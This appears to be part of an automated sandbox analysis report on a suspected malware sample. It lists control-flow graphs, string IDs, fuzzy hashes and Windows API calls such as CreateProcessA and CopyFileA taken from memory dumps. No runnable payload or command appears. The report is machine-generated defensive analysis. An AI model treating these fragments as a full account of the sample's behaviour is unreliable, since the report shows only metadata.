                                                                                  control_flow_graph 1688 7437b78-7437bb5 1690 7437bd7-7437bed call 7437980 1688->1690 1691 7437bb7-7437bba 1688->1691 1697 7437f63-7437f77 1690->1697 1698 7437bf3-7437bff 1690->1698 1804 7437bbc call 7438490 1691->1804 1805 7437bbc call 74384e8 1691->1805 1693 7437bc2-7437bc4 1693->1690 1695 7437bc6-7437bce 1693->1695 1695->1690 1707 7437fb7-7437fc0 1697->1707 1699 7437d30-7437d37 1698->1699 1700 7437c05-7437c08 1698->1700 1702 7437e66-7437ea0 call 7437388 1699->1702 1703 7437d3d-7437d46 1699->1703 1704 7437c0b-7437c14 1700->1704 1808 7437ea3 call 743a320 1702->1808 1809 7437ea3 call 743a330 1702->1809 1703->1702 1708 7437d4c-7437e58 call 7437388 call 7437918 call 7437388 1703->1708 1705 7437c1a-7437c2e 1704->1705 1706 7438058 1704->1706 1722 7437d20-7437d2a 1705->1722 1723 7437c34-7437cc9 call 7437980 * 2 call 7437388 call 7437918 call 74379c0 call 7437a68 call 7437ad0 1705->1723 1712 743805d-7438061 1706->1712 1710 7437fc2-7437fc9 1707->1710 1711 7437f85-7437f8e 1707->1711 1801 7437e63-7437e64 1708->1801 1802 7437e5a 1708->1802 1716 7438017-743801e 1710->1716 1717 7437fcb-743800e call 7437388 1710->1717 1711->1706 1715 7437f94-7437fa6 1711->1715 1719 7438063 1712->1719 1720 743806c-7438094 1712->1720 1736 7437fb6 1715->1736 1737 7437fa8-7437fad 1715->1737 1724 7438043-7438056 1716->1724 1725 7438020-7438030 1716->1725 1717->1716 1719->1720 1733 7438027-7438030 1720->1733 1734 7438096 1720->1734 1722->1699 1722->1704 1780 7437ccb-7437ce3 call 7437a68 call 7437388 call 7437638 1723->1780 1781 7437ce8-7437d1b call 7437ad0 1723->1781 1724->1712 1725->1724 1740 7438032-743803a 1725->1740 1733->1724 1733->1740 1736->1707 1806 7437fb0 call 743aac1 1737->1806 1807 7437fb0 call 743aad0 1737->1807 1740->1724 1749 7437ea9-7437f5a call 7437388 1749->1697 1780->1781 1781->1722 1801->1702 1802->1801 1804->1693 1805->1693 1806->1736 1807->1736 1808->1749 1809->1749
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq$4'kq$4'kq
                                                                                  • API String ID: 0-2478202913
                                                                                  • Opcode ID: e4226e90155b0880682eedff8fae13e2071872a9a29a528966eded55d13fb678
                                                                                  • Instruction ID: d5052ffe0dee03ccb99baeb8fd5d54485be4487ef54952d241fff9423d3ab16e
                                                                                  • Opcode Fuzzy Hash: e4226e90155b0880682eedff8fae13e2071872a9a29a528966eded55d13fb678
                                                                                  • Instruction Fuzzy Hash: 5FF10A74A10218DFCB05DFA8D998A9DB7B2FF89300F518159E846AB3A5CB75EC42CF50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1810 743c160-743c170 1811 743c176-743c17a 1810->1811 1812 743c289-743c2ae 1810->1812 1813 743c180-743c189 1811->1813 1814 743c2b5-743c2da 1811->1814 1812->1814 1815 743c2e1-743c317 1813->1815 1816 743c18f-743c1b6 1813->1816 1814->1815 1833 743c31e-743c374 1815->1833 1827 743c27e-743c288 1816->1827 1828 743c1bc-743c1be 1816->1828 1830 743c1c0-743c1c3 1828->1830 1831 743c1df-743c1e1 1828->1831 1832 743c1c9-743c1d3 1830->1832 1830->1833 1834 743c1e4-743c1e8 1831->1834 1832->1833 1836 743c1d9-743c1dd 1832->1836 1848 743c376-743c38a 1833->1848 1849 743c398-743c3af 1833->1849 1837 743c1ea-743c1f9 1834->1837 1838 743c249-743c255 1834->1838 1836->1831 1836->1834 1837->1833 1843 743c1ff-743c246 1837->1843 1838->1833 1839 743c25b-743c278 1838->1839 1839->1827 1839->1828 1843->1838 1924 743c38d call 743c9d9 1848->1924 1925 743c38d call 743c878 1848->1925 1858 743c4a0-743c4b0 1849->1858 1859 743c3b5-743c49b call 7437980 call 7437388 * 2 call 74379c0 call 743b198 call 7437388 call 743a330 call 7438228 1849->1859 1854 743c393 1856 743c5c3-743c5ce 1854->1856 1866 743c5d0-743c5e0 1856->1866 1867 743c5fd-743c61e call 7437ad0 1856->1867 1868 743c4b6-743c590 call 7437980 * 2 call 7438138 call 7437388 * 2 call 7437638 call 7437ad0 call 7437388 1858->1868 1869 743c59e-743c5ba call 7437388 1858->1869 1859->1858 1879 743c5e2-743c5e8 1866->1879 1880 743c5f0-743c5f8 call 7438228 1866->1880 1921 743c592 1868->1921 1922 743c59b 1868->1922 1869->1856 1879->1880 1880->1867 1921->1922 1922->1869 1924->1854 1925->1854
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq$(oq$Hoq
                                                                                  • API String ID: 0-3836682603
                                                                                  • Opcode ID: 5af5ed5f11e4695e50446a7e51a2407d9d1a6b4378559787378a19037eabebad
                                                                                  • Instruction ID: f9a7a4ff65a59a54a5713fc2514c79ec5e61b3de098202a36d140daf8bba4b44
                                                                                  • Opcode Fuzzy Hash: 5af5ed5f11e4695e50446a7e51a2407d9d1a6b4378559787378a19037eabebad
                                                                                  • Instruction Fuzzy Hash: 66E15374A00209DFCB14EFA4D59499EBBB2FF89310F118569E805AB3A4DB34ED45CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2220 74b506c-74b50d6 2223 74b50d8-74b50e2 2220->2223 2224 74b510f-74b5171 CreateFileA 2220->2224 2223->2224 2225 74b50e4-74b50e6 2223->2225 2233 74b517a-74b51ba 2224->2233 2234 74b5173-74b5179 2224->2234 2227 74b5109-74b510c 2225->2227 2228 74b50e8-74b50f2 2225->2228 2227->2224 2229 74b50f6-74b5105 2228->2229 2230 74b50f4 2228->2230 2229->2229 2231 74b5107 2229->2231 2230->2229 2231->2227 2239 74b51ca-74b51f8 2233->2239 2240 74b51bc-74b51c0 2233->2240 2234->2233 2243 74b51bb-74b51c0 2239->2243 2244 74b51fa-74b51fc 2239->2244 2240->2239 2241 74b51c2 2240->2241 2241->2239 2243->2239 2243->2241
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 074B5161
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID: d
                                                                                  • API String ID: 823142352-2564639436
                                                                                  • Opcode ID: 930c82c725ec16d2063167bdf326de117a46dc266e94e3d0096fe4f7524cfdb3
                                                                                  • Instruction ID: 162518e77e3be907d0f0b15f782e2f576a7bb534891f1036632bff7b804ec40d
                                                                                  • Opcode Fuzzy Hash: 930c82c725ec16d2063167bdf326de117a46dc266e94e3d0096fe4f7524cfdb3
                                                                                  • Instruction Fuzzy Hash: 624155B1D002599FDB20CFA9C881BDEFBB1FF48310F14842AE815AB254DB759891CFA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054592830.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70f0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq$4'kq
                                                                                  • API String ID: 0-4171853269
                                                                                  • Opcode ID: c61838c0e62390468ed74a81652e1a48670edcafc5f0f86bd384e9cd57bd7e2c
                                                                                  • Instruction ID: 87cce832bbfae59f238ec55b55ab8e0df05e3e4f65f6d004cec5cb6c1d828004
                                                                                  • Opcode Fuzzy Hash: c61838c0e62390468ed74a81652e1a48670edcafc5f0f86bd384e9cd57bd7e2c
                                                                                  • Instruction Fuzzy Hash: 4542E8B8E0020ECFDB55DBA8D598AADBBB1FF49301F508215D612AB794C7399C86CF50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2582 70f29d0-70f29f8 2583 70f29ff-70f2a28 2582->2583 2584 70f29fa 2582->2584 2585 70f2a2a-70f2a33 2583->2585 2586 70f2a49 2583->2586 2584->2583 2588 70f2a3a-70f2a3d 2585->2588 2589 70f2a35-70f2a38 2585->2589 2587 70f2a4c-70f2a50 2586->2587 2591 70f2e07-70f2e1e 2587->2591 2590 70f2a47 2588->2590 2589->2590 2590->2587 2593 70f2a55-70f2a59 2591->2593 2594 70f2e24-70f2e28 2591->2594 2595 70f2a5e-70f2a62 2593->2595 2596 70f2a5b-70f2ab8 2593->2596 2597 70f2e5d-70f2e61 2594->2597 2598 70f2e2a-70f2e5a 2594->2598 2600 70f2a8b-70f2aaf 2595->2600 2601 70f2a64-70f2a88 2595->2601 2604 70f2abd-70f2ac1 2596->2604 2605 70f2aba-70f2b2b 2596->2605 2602 70f2e63-70f2e6c 2597->2602 2603 70f2e82 2597->2603 2598->2597 2600->2591 2601->2600 2608 70f2e6e-70f2e71 2602->2608 2609 70f2e73-70f2e76 2602->2609 2606 70f2e85-70f2e8b 2603->2606 2612 70f2aea-70f2b11 2604->2612 2613 70f2ac3-70f2ae7 2604->2613 2616 70f2b2d-70f2b8a 2605->2616 2617 70f2b30-70f2b34 2605->2617 2610 70f2e80 2608->2610 2609->2610 2610->2606 2637 70f2b13-70f2b19 2612->2637 2638 70f2b21-70f2b22 2612->2638 2613->2612 2626 70f2b8f-70f2b93 2616->2626 2627 70f2b8c-70f2be8 2616->2627 2621 70f2b5d-70f2b81 2617->2621 2622 70f2b36-70f2b5a 2617->2622 2621->2591 2622->2621 2630 70f2bbc-70f2bbf 2626->2630 2631 70f2b95-70f2bb9 2626->2631 2639 70f2bed-70f2bf1 2627->2639 2640 70f2bea-70f2c4c 2627->2640 2648 70f2bc7-70f2bdf 2630->2648 2631->2630 2637->2638 2638->2591 2643 70f2c1a-70f2c32 2639->2643 2644 70f2bf3-70f2c17 2639->2644 2649 70f2c4e-70f2cb0 2640->2649 2650 70f2c51-70f2c55 2640->2650 2661 70f2c34-70f2c3a 2643->2661 2662 70f2c42-70f2c43 2643->2662 2644->2643 2648->2591 2659 70f2cb5-70f2cb9 2649->2659 2660 70f2cb2-70f2d14 2649->2660 2653 70f2c7e-70f2c96 2650->2653 2654 70f2c57-70f2c7b 2650->2654 2672 70f2c98-70f2c9e 2653->2672 2673 70f2ca6-70f2ca7 2653->2673 2654->2653 2664 70f2cbb-70f2cdf 2659->2664 2665 70f2ce2-70f2cfa 2659->2665 2670 70f2d19-70f2d1d 2660->2670 2671 70f2d16-70f2d78 2660->2671 2661->2662 2662->2591 2664->2665 2683 70f2cfc-70f2d02 2665->2683 2684 70f2d0a-70f2d0b 2665->2684 2675 70f2d1f-70f2d43 2670->2675 2676 70f2d46-70f2d5e 2670->2676 2681 70f2d7d-70f2d81 2671->2681 2682 70f2d7a-70f2dd3 2671->2682 2672->2673 2673->2591 2675->2676 2694 70f2d6e-70f2d6f 2676->2694 2695 70f2d60-70f2d66 2676->2695 2686 70f2daa-70f2dcd 2681->2686 2687 70f2d83-70f2da7 2681->2687 2692 70f2dfc-70f2dff 2682->2692 2693 70f2dd5-70f2df9 2682->2693 2683->2684 2684->2591 2686->2591 2687->2686 2692->2591 2693->2692 2694->2591 2695->2694
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054592830.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70f0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq$4'kq
                                                                                  • API String ID: 0-4171853269
                                                                                  • Opcode ID: 9dac4ca4d68e58c31665e597e43ea5af1d502eff550cab01d364aa104e5ba50d
                                                                                  • Instruction ID: 6de9b874709344da928ac285927dd914a70c0c5039540cfb9270b1f0b177d631
                                                                                  • Opcode Fuzzy Hash: 9dac4ca4d68e58c31665e597e43ea5af1d502eff550cab01d364aa104e5ba50d
                                                                                  • Instruction Fuzzy Hash: CDF1F6B8D01209DFCB69DFA4D5996ECBBB2FF49315F604229E916A7390CB345886CF40

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2707 7435800-7435812 2708 7435814-7435835 2707->2708 2709 743583c-7435840 2707->2709 2708->2709 2710 7435842-7435844 2709->2710 2711 743584c-743585b 2709->2711 2710->2711 2712 7435867-7435893 2711->2712 2713 743585d 2711->2713 2717 7435ac0-7435b07 2712->2717 2718 7435899-743589f 2712->2718 2713->2712 2750 7435b09 2717->2750 2751 7435b1d-7435b29 2717->2751 2720 7435971-7435975 2718->2720 2721 74358a5-74358ab 2718->2721 2722 7435977-7435980 2720->2722 2723 7435998-74359a1 2720->2723 2721->2717 2725 74358b1-74358be 2721->2725 2722->2717 2727 7435986-7435996 2722->2727 2728 74359a3-74359c3 2723->2728 2729 74359c6-74359c9 2723->2729 2730 7435950-7435959 2725->2730 2731 74358c4-74358cd 2725->2731 2732 74359cc-74359d2 2727->2732 2728->2729 2729->2732 2730->2717 2735 743595f-743596b 2730->2735 2731->2717 2734 74358d3-74358eb 2731->2734 2732->2717 2737 74359d8-74359eb 2732->2737 2738 74358f7-7435909 2734->2738 2739 74358ed 2734->2739 2735->2720 2735->2721 2737->2717 2741 74359f1-7435a01 2737->2741 2738->2730 2745 743590b-7435911 2738->2745 2739->2738 2741->2717 2744 7435a07-7435a14 2741->2744 2744->2717 2747 7435a1a-7435a2f 2744->2747 2748 7435913 2745->2748 2749 743591d-7435923 2745->2749 2747->2717 2757 7435a35-7435a58 2747->2757 2748->2749 2749->2717 2755 7435929-743594d 2749->2755 2756 7435b0c-7435b0e 2750->2756 2753 7435b35-7435b51 2751->2753 2754 7435b2b 2751->2754 2754->2753 2758 7435b52-7435b58 2756->2758 2759 7435b10-7435b1b 2756->2759 2757->2717 2764 7435a5a-7435a65 2757->2764 2766 7435b5a-7435b78 call 7431070 2758->2766 2767 7435b7c-7435b7f 2758->2767 2759->2751 2759->2756 2768 7435a67-7435a71 2764->2768 2769 7435ab6-7435abd 2764->2769 2766->2767 2771 7435b81-7435b87 2767->2771 2772 7435b97-7435b99 2767->2772 2768->2769 2779 7435a73-7435a89 2768->2779 2773 7435b8b-7435b8d 2771->2773 2774 7435b89 2771->2774 2795 7435b9b call 7436a20 2772->2795 2796 7435b9b call 74369d0 2772->2796 2797 7435b9b call 7435c18 2772->2797 2773->2772 2774->2772 2775 7435ba1-7435ba5 2777 7435bf0-7435c00 2775->2777 2778 7435ba7-7435bbe 2775->2778 2778->2777 2786 7435bc0-7435bca 2778->2786 2783 7435a95-7435aae 2779->2783 2784 7435a8b 2779->2784 2783->2769 2784->2783 2790 7435bdd-7435bed 2786->2790 2791 7435bcc-7435bdb 2786->2791 2791->2790 2795->2775 2796->2775 2797->2775
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq$d
                                                                                  • API String ID: 0-886291620
                                                                                  • Opcode ID: 34b3942e9cb1ba3cc248ce4f8e5c9af264c3b5cff664bf429cea5379c59d53d6
                                                                                  • Instruction ID: 116d00c6931abbe310d2dd7e752a910eaa4cf5d69f7cba32e9cd986c2edfffb0
                                                                                  • Opcode Fuzzy Hash: 34b3942e9cb1ba3cc248ce4f8e5c9af264c3b5cff664bf429cea5379c59d53d6
                                                                                  • Instruction Fuzzy Hash: C7D16C74700606CFCB14DF28C5809AAFBF6FF89310B69896AD45A9B365DB30F855CB90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2866 70f3968-70f398d 2867 70f398f 2866->2867 2868 70f3994-70f39b3 2866->2868 2867->2868 2869 70f39b5-70f39be 2868->2869 2870 70f39d4 2868->2870 2871 70f39c5-70f39c8 2869->2871 2872 70f39c0-70f39c3 2869->2872 2873 70f39d7-70f39db 2870->2873 2874 70f39d2 2871->2874 2872->2874 2875 70f3b96-70f3bad 2873->2875 2874->2873 2877 70f3bb3-70f3bb7 2875->2877 2878 70f39e0-70f39e4 2875->2878 2881 70f3bb9-70f3bdd 2877->2881 2882 70f3be0-70f3be4 2877->2882 2879 70f39e9-70f39ed 2878->2879 2880 70f39e6-70f3a41 2878->2880 2886 70f39ef-70f39fc 2879->2886 2887 70f3a16-70f3a38 2879->2887 2891 70f3a46-70f3a4a 2880->2891 2892 70f3a43-70f3aa4 2880->2892 2881->2882 2883 70f3be6-70f3bef 2882->2883 2884 70f3c05 2882->2884 2889 70f3bf6-70f3bf9 2883->2889 2890 70f3bf1-70f3bf4 2883->2890 2888 70f3c08-70f3c0e 2884->2888 2909 70f3a05-70f3a13 2886->2909 2887->2875 2895 70f3c03 2889->2895 2890->2895 2897 70f3a4c-70f3a70 2891->2897 2898 70f3a73-70f3a8a 2891->2898 2901 70f3aa9-70f3aad 2892->2901 2902 70f3aa6-70f3b07 2892->2902 2895->2888 2897->2898 2911 70f3a8c-70f3a92 2898->2911 2912 70f3a9a-70f3a9b 2898->2912 2906 70f3aaf-70f3ad3 2901->2906 2907 70f3ad6-70f3aed 2901->2907 2913 70f3b0c-70f3b10 2902->2913 2914 70f3b09-70f3b62 2902->2914 2906->2907 2922 70f3aef-70f3af5 2907->2922 2923 70f3afd-70f3afe 2907->2923 2909->2887 2911->2912 2912->2875 2918 70f3b39-70f3b5c 2913->2918 2919 70f3b12-70f3b36 2913->2919 2924 70f3b8b-70f3b8e 2914->2924 2925 70f3b64-70f3b88 2914->2925 2918->2875 2919->2918 2922->2923 2923->2875 2924->2875 2925->2924
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054592830.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70f0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq$4'kq
                                                                                  • API String ID: 0-4171853269
                                                                                  • Opcode ID: 5dbbcd84d6cd55bd28f213dec4c8953d62d57c024f4bec0ae5c36b4a760e0a44
                                                                                  • Instruction ID: 5a5930b6ea728e16cdaa0b5197c47d18fb495eb04754fc561f21a88f5c776c27
                                                                                  • Opcode Fuzzy Hash: 5dbbcd84d6cd55bd28f213dec4c8953d62d57c024f4bec0ae5c36b4a760e0a44
                                                                                  • Instruction Fuzzy Hash: 3A91EFB4E15209CFDB19DFA9D494AECBBB2FF89311F10952AD921B7290CB355882CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq$Hoq
                                                                                  • API String ID: 0-3084834809
                                                                                  • Opcode ID: df33902c849559c1d1292b95545fe9d7615e10afe2777ed4d2f4857dc2b95c93
                                                                                  • Instruction ID: c451d6d3571e54dc3ae1f649e890e99f00516ccd4378a69ad2a7d9623713e0dc
                                                                                  • Opcode Fuzzy Hash: df33902c849559c1d1292b95545fe9d7615e10afe2777ed4d2f4857dc2b95c93
                                                                                  • Instruction Fuzzy Hash: 1F51BBB07006598FC719AF39C5646AE7BB6AF8A200B24456ED4468F3E1CF35DD42CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq$(oq
                                                                                  • API String ID: 0-3207256227
                                                                                  • Opcode ID: 7d326e89122ae984176d923a70f7f821ed6c8bebb945c33e86f6af93f35626c2
                                                                                  • Instruction ID: c259416df0f78c155c292bf55416e840d8b33904750c6f75667355003d35e44e
                                                                                  • Opcode Fuzzy Hash: 7d326e89122ae984176d923a70f7f821ed6c8bebb945c33e86f6af93f35626c2
                                                                                  • Instruction Fuzzy Hash: 9251BE713002468FDB159F29D8546AE7BA2FF88350F64816AE805CF391CF39DC86CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,oq
                                                                                  • API String ID: 0-651702701
                                                                                  • Opcode ID: 24614a06d97af9b95bc1ef6de9d7a05f77b81c9ae6930b3dfe0b7b3c153da08f
                                                                                  • Instruction ID: c75f445e15ba29829484c2a102614720f3c8eb42cdd8de26e784bd9e4f01adcb
                                                                                  • Opcode Fuzzy Hash: 24614a06d97af9b95bc1ef6de9d7a05f77b81c9ae6930b3dfe0b7b3c153da08f
                                                                                  • Instruction Fuzzy Hash: 33522EB5A002288FDB64CF69C951BDDBBF6BF88300F1541E9E549AB391DA309D81CF61
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (_kq
                                                                                  • API String ID: 0-2183774854
                                                                                  • Opcode ID: 0345aad647017b6dc127e6590ea2913353a4d97a823d28d4a463948ba2249988
                                                                                  • Instruction ID: 0d4d0e0fd6105cba3f9a15549f5c2e4f7a7764f1229f059a94dbfef9281b3783
                                                                                  • Opcode Fuzzy Hash: 0345aad647017b6dc127e6590ea2913353a4d97a823d28d4a463948ba2249988
                                                                                  • Instruction Fuzzy Hash: 98229FB5A002159FDB14DFA9D891AAEB7B2BF88300F14816AE905DF3A1CB75EC41CB50
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074BF102
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 554c1f2dedc4856bb20395f5c848d055fb5d60d7079d30367ae9df50033012d0
                                                                                  • Instruction ID: ce2d8bffa4eae66cc560adbe000c5a1a758fdbaccfda57519b3e9eb7f8a3ff30
                                                                                  • Opcode Fuzzy Hash: 554c1f2dedc4856bb20395f5c848d055fb5d60d7079d30367ae9df50033012d0
                                                                                  • Instruction Fuzzy Hash: 7C8138B1D0025ADFDB20CFA9C9817DEBBF1BF48314F14852AE858A7354D7749885CBA1
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074BF102
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 14a3bd19cdb88887a5d2aea971d6e58dc0e6c363c5317c6b6690d71950c01ecd
                                                                                  • Instruction ID: 80c0ced20603025f765b9f8cad6518eb19361c6ab6c8d016f4c5812363b467a4
                                                                                  • Opcode Fuzzy Hash: 14a3bd19cdb88887a5d2aea971d6e58dc0e6c363c5317c6b6690d71950c01ecd
                                                                                  • Instruction Fuzzy Hash: 3F8127B1D0025ADFDB20CFA9C9817DEBBF1BF88314F14852AE858A7354D7749885CBA1
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0133A57E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 6dba4ff56a50e829fb667f02b102c7b8435401952b466d58bc2c6019b31654f5
                                                                                  • Instruction ID: 73c9b409184f3b5333af3edf9f0f15cfe1244870459050d858d8369a84bdd2fe
                                                                                  • Opcode Fuzzy Hash: 6dba4ff56a50e829fb667f02b102c7b8435401952b466d58bc2c6019b31654f5
                                                                                  • Instruction Fuzzy Hash: E78134B0A00B058FEB25DF29D44579ABBF1BF88318F008A2DD48AD7B50D775E845CB94
                                                                                  APIs
                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 074B441D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 6c3e4db9624321e1b45e1ac115d36d1c1ece771108bdf267f395394e62989c97
                                                                                  • Instruction ID: 4986e75dd64f912a2367c7e83e3db571925ab09ea901aaee52bea5aaa635de58
                                                                                  • Opcode Fuzzy Hash: 6c3e4db9624321e1b45e1ac115d36d1c1ece771108bdf267f395394e62989c97
                                                                                  • Instruction Fuzzy Hash: C0518CB0D006699FDB20CFA9C9457DEBBF1FF48310F18812AD854E7345D77498858B91
                                                                                  APIs
                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 074B441D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 2203c762183e90c338d7ed93ece6f24dbd50eec9b620a59cb8e897eedbb0b48f
                                                                                  • Instruction ID: 98f1dd71c0dd737025e1b33e1dd99753d76e512e56b448c38b264e7a65160944
                                                                                  • Opcode Fuzzy Hash: 2203c762183e90c338d7ed93ece6f24dbd50eec9b620a59cb8e897eedbb0b48f
                                                                                  • Instruction Fuzzy Hash: E3517CB1D002699FDB20CFADC9857DEBBF1BF48310F18812AD855E7385D77498858B91
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 074B5161
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 7c1533ac886caef14e059225738fbe2550fad12955b8677eb6229ca610a54b2a
                                                                                  • Instruction ID: cf28fd04dd6f6b724adc045c700027f7b7161c001b8c3a2214433d0d851601f4
                                                                                  • Opcode Fuzzy Hash: 7c1533ac886caef14e059225738fbe2550fad12955b8677eb6229ca610a54b2a
                                                                                  • Instruction Fuzzy Hash: 794134B1D002599FDB20DFA9C985BDEFBB1EF88310F14842AE815A6250DB759891CF91
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 074B5594
                                                                                  Memory Dump Source
